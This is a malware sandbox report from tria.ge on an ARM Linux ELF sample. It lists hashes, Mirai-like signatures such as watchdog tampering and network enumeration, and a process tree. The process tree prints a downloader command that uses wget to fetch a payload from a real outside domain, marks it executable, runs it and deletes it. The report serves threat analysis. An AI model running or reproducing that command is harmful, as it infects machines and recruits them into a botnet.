Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    140s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20231215-en
  • resource tags

    arch:armhfimage:debian9-armhf-20231215-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    19/02/2024, 09:49

General

  • Target

    4d21edf2f074bb83a118e4321c912922.elf

  • Size

    127KB

  • MD5

    4d21edf2f074bb83a118e4321c912922

  • SHA1

    7816908c6cf7c4c105338a097a84578602396f7b

  • SHA256

    19936aea14ea5d32bf54625c3a2e6d735e24b866ff33f76d3d654620ecb2f0fa

  • SHA512

    1da50741de1b474fa6e77cfc488976f9558650a4ff0be7a089dfb86138daabfa89f97b786b842418049b8a26ed95fbf7b52c04543c736939656d898d7590335a

  • SSDEEP

    3072:+DShVLkDZ6waCAdclEbYJOmP46aQyfPluesNb:VhVeZ6zclEboOmP46aQyfPluesNb

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/4d21edf2f074bb83a118e4321c912922.elf
    /tmp/4d21edf2f074bb83a118e4321c912922.elf
    1⤵
    • Changes its process name
    • Reads system routing table
    • Reads system network configuration
    PID:656
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      2⤵
        PID:657
        • /usr/bin/wget
          wget -q http://gay.energy/.../vivid -O .....
          3⤵
          • Writes file to tmp directory
          PID:661
        • /bin/chmod
          chmod 777 .....
          3⤵
            PID:672
          • /tmp/.....
            ./.....
            3⤵
            • Executes dropped EXE
            PID:673
          • /bin/sh
            /bin/sh ./.....
            3⤵
              PID:673
            • /bin/rm
              rm -rf .....
              3⤵
                PID:675

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads